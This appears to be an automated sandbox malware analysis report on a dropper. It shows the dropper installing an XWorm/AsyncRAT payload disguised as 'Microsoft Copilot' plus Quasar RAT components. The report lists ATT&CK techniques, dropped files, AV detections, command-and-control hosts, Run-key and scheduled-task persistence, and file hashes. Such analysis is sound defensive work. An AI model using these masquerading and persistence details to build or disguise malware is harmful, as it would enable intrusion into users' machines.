                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                    Execution: 12 Windows Management Instrumentation; 1 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                    Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Privilege Escalation: 1 DLL Side-Loading; 12 Process Injection; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 22 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 151 Virtualization/Sandbox Evasion; 12 Process Injection
                    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                    Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 541 Security Software Discovery; 2 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; System Owner/User Discovery; Network Sniffing
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                    Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                    Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                    Behavior Graph

                    Behavior Graph ID: 1527486, Sample: PixpFUv4G7.exe, Startdate: 07/10/2024, Architecture: WINDOWS, Score: 100. The graph is rendered below as a text process tree; bracketed figures are the graph's created-registry-value and created-file counters exactly as shown on the graph nodes.

                    Graph level, DNS/IP: ip-api.com; content-portion.gl.at.ply.gg
                    Graph level, signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures

                    PixpFUv4G7.exe [3 3]
                        dropped: C:\Users\user\AppData\Local\...\Copilot.exe, PE32
                        signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        unarchiver.exe [4]
                            7za.exe [59]
                                dropped: C:\Users\user\AppData\...\protobuf-net.dll, PE32; C:\Users\user\AppData\Local\...\client.bin, PE32; C:\Users\user\...\Quasar.resources.dll, PE32; 20 other files (19 malicious)
                                conhost.exe
                        Copilot.exe [15 6]
                            DNS/IP: ip-api.com 208.95.112.1, 49699, 80, TUT-ASUS United States; content-portion.gl.at.ply.gg 147.185.221.21, 47900, 49971, 49973, SALSGIVERUS United States
                            dropped: C:\Users\user\...\Microsoft Copilot.exe, PE32
                            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 6 other signatures
                            powershell.exe [23]
                                signature: Loading BitLocker PowerShell Module
                                conhost.exe
                            powershell.exe [23]
                                conhost.exe
                            powershell.exe
                                conhost.exe
                            2 other processes
                                conhost.exe
                                conhost.exe
                    Microsoft Copilot.exe
                    Microsoft Copilot.exe
                    2 other processes

                    SourceDetectionScannerLabelLink
                    PixpFUv4G7.exe71%ReversingLabsWin32.Dropper.Dapato
                    PixpFUv4G7.exe100%AviraTR/Dropper.Gen
                    PixpFUv4G7.exe100%Joe Sandbox ML
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\Copilot.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Copilot.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Copilot.exe | 84% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | 84% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Gma.System.MouseKeyHook.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Guna.UI2.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe | 53% | ReversingLabs | Win32.Backdoor.Quasar
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.TestPlatform.AdapterUtilities.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.CodeCoverage.Shim.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.Interface.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Mdb.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Rocks.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Open.Nat.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.Tests.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll | 79% | ReversingLabs | ByteCode-MSIL.Trojan.QuasarRAT
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Vestris.ResourceLib.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\aa-DJ\Quasar.resources.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin | 73% | ReversingLabs | ByteCode-MSIL.Backdoor.Quasar
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\protobuf-net.dll | 0% | ReversingLabs |
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
https://api.ipify.org/ | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
content-portion.gl.at.ply.gg | 147.185.221.21 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
content-portion.gl.at.ply.gg | true | | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | client.bin.4.dr | false | URL Reputation: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000000C.00000002.1351632078.0000022690255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1447953532.000002189B856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1613594243.00000204BADF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/14436606/23354 | client.bin.4.dr | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000C.00000002.1333585474.0000022680409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188BA0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAFAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp, Open.Nat.dll.4.dr | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/lontivero/Open.Nat/issuesOAlso | Open.Nat.dll.4.dr | false | | unknown
http://www.microsoft.co | powershell.exe, 00000010.00000002.1461828423.00000218A3D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1463069808.00000218A3F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1850332223.00000205D1B7D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1846070427.00000205D1980000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/envelope/ | Open.Nat.dll.4.dr | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crl.mi | powershell.exe, 00000013.00000002.1629544454.00000204C320A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.m | powershell.exe, 00000015.00000002.1843224693.00000205D189C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ion=v4.5 | powershell.exe, 00000013.00000002.1637714732.00000204C340C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://stackoverflow.com/q/11564914/23354; | client.bin.4.dr | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000C.00000002.1333585474.0000022680409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188BA0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAFAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000C.00000002.1351632078.0000022690255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1447953532.000002189B856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1613594243.00000204BADF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 0000000C.00000002.1333585474.00000226801E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188B7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B94E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/2152978/23354sCannot | client.bin.4.dr | false | | unknown
https://ipwho.is/ | client.bin.4.dr | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Copilot.exe, 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1333585474.00000226801E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188B7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B94E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/novotnyllc/bc-csharp | BouncyCastle.Crypto.dll.4.dr | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
147.185.221.21 | content-portion.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1527486
Start date and time: 2024-10-07 00:52:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PixpFUv4G7.exe (renamed because the original name is a hash value)
Original Sample Name: 066cffd2ba05642d4bcadf466fa00ba50210b6aed526c07382924c7aaece384e.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@27/74@2/2
EGA Information:
• Successful, ratio: 27.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 152
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Microsoft Copilot.exe, PID 2044 because it is empty
• Execution Graph export aborted for target Microsoft Copilot.exe, PID 3088 because it is empty
• Execution Graph export aborted for target Microsoft Copilot.exe, PID 4008 because it is empty
• Execution Graph export aborted for target Microsoft Copilot.exe, PID 5784 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1352 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7488 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8028 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• VT rate limit hit for: PixpFUv4G7.exe
Time | Type | Description
02:35:11 | Task Scheduler | Run new task: Microsoft Copilot path: C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe
02:35:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Copilot C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe
02:35:23 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Copilot C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe
02:35:31 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Copilot.lnk
18:53:12 | API Interceptor | 59x Sleep call for process: powershell.exe modified
20:35:10 | API Interceptor | 181x Sleep call for process: Copilot.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | H2f8SkAvdV.exe | malicious | Blank Grabber, XWorm | ip-api.com/json/?fields=225545
208.95.112.1 | A39tzaySzX.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | Bpz46JayQ4.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | qtYuyATh0U.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | SOA-injazfe-10424.vbs | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | ip-api.com/line?fields=query,country
208.95.112.1 | BootstrapperV1.19.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | NewLoaderCracks_1.32.exe | malicious | DCRat | ip-api.com/line/?fields=hosting
208.95.112.1 | SolaraV3.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | SolaraV3.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
147.185.221.21 | r4RF3TX5Mi.exe | malicious | XWorm |
147.185.221.21 | ra66DSpa.exe | malicious | XWorm |
147.185.221.21 | Q5N7WOpk8J.bat | malicious | Unknown |
147.185.221.21 | NzEsfIiAc0.exe | malicious | XWorm |
147.185.221.21 | Y666Gn09a1.exe | malicious | XWorm |
147.185.221.21 | Uhj9qfwbYG.exe | malicious | AsyncRAT, XWorm |
147.185.221.21 | WIN CHANGER 2.3.exe | malicious | XWorm |
147.185.221.21 | jj7svxNeaQ.exe | malicious | XWorm |
147.185.221.21 | PCCooker2.0_x64.exe | malicious | AsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRat |
147.185.221.21 | JFhDGHXmW6.exe | malicious | Unknown |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | H2f8SkAvdV.exe | malicious | Blank Grabber, XWorm | 208.95.112.1
ip-api.com | A39tzaySzX.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ip-api.com | Bpz46JayQ4.exe | malicious | XWorm | 208.95.112.1
ip-api.com | qtYuyATh0U.exe | malicious | XWorm | 208.95.112.1
ip-api.com | SOA-injazfe-10424.vbs | malicious | XWorm | 208.95.112.1
ip-api.com | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 208.95.112.1
ip-api.com | BootstrapperV1.19.exe | malicious | XWorm | 208.95.112.1
ip-api.com | NewLoaderCracks_1.32.exe | malicious | DCRat | 208.95.112.1
ip-api.com | SolaraV3.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | SolaraV3.exe | malicious | Blank Grabber | 208.95.112.1

Match | Associated Sample Name / URL | Detection | Threat Name | Context
TUT-ASUS | H2f8SkAvdV.exe | malicious | Blank Grabber, XWorm | 208.95.112.1
TUT-ASUS | A39tzaySzX.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
TUT-ASUS | Bpz46JayQ4.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | qtYuyATh0U.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | SOA-injazfe-10424.vbs | malicious | XWorm | 208.95.112.1
TUT-ASUS | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 208.95.112.1
TUT-ASUS | BootstrapperV1.19.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | NewLoaderCracks_1.32.exe | malicious | DCRat | 208.95.112.1
TUT-ASUS | SolaraV3.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | SolaraV3.exe | malicious | Blank Grabber | 208.95.112.1
SALSGIVERUS | H2f8SkAvdV.exe | malicious | Blank Grabber, XWorm | 147.185.221.23
SALSGIVERUS | A39tzaySzX.exe | malicious | AsyncRAT, XWorm | 147.185.221.23
SALSGIVERUS | Bpz46JayQ4.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | e4L9TXRBhB.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | H1N45BQJ8x.exe | malicious | XWorm | 147.185.221.23
SALSGIVERUS | r4RF3TX5Mi.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | BootstrapperV1.19.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | ra66DSpa.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | tMREqVW0.exe | malicious | XWorm | 147.185.221.19
SALSGIVERUS | wSVyC8FY.exe | malicious | XWorm | 147.185.221.22

No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll | PVUfopbGfc.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll | OqAVRCkQ3T.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll | PVUfopbGfc.exe | malicious | LummaC |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll | OqAVRCkQ3T.exe | malicious | LummaC |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll | mapMd1URzq.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll | mnFHs2DuKg.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll | External.exe | malicious | Ades Stealer, BlackGuard, VEGA Stealer |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll | newvideozones.click.ps1 | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll | use_2024_t#U043e_#U043epen.zip | malicious | Unknown |
Process: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................
                                                                                    Process:C:\Users\user\Desktop\PixpFUv4G7.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):71680
                                                                                    Entropy (8bit):6.095413522527565
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:Q1V7h9TmCQFaZvmb5hcnl5xbdCPsPlyxCwtX5KG6lO14JWG:QLfTHMAtbdCPSeJKtO14wG
                                                                                    MD5:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    SHA1:4A5B7EA6C89DCD73D7C87EC7B3A7B3B266CCCD9B
                                                                                    SHA-256:D2F99E47B2E4C82BCC45E74FE83792F5C90E530B02A8B65837F256008F8A1C98
                                                                                    SHA-512:0FB243D4D9DAD3365E165500B8594B4208E1A9AB0CDF1DA778F6DFC43381357A8306C9EF2C34D8426D6E8EF48649918A2FBC81E2C5E5F2C573BF9F2CA8C9A5A7
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: ditekSHen
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 84%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.g.............................-... ...@....@.. ....................................@.................................p-..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........c..........&.....................................................(....*.r...p*. C{..*..(....*.r...p*. 6V=.*.s.........s.........s.........s.........*.r+..p*. v...*.r...p*. S...*.rU..p*. ..n.*.r...p*. ....*.r...p*. ..d.*..((...*.r2..p*. . ..*.r...p*. `..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rl..p*. .'..*.r...p*. ...*.r!..p*. ..e.*.rA..p*. ~.H.*.ra..p*. ...*.r...p*. .h..*.r..
                                                                                    Process:C:\Users\user\AppData\Local\Temp\Copilot.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):41
                                                                                    Entropy (8bit):3.7195394315431693
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                                    MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                                    SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
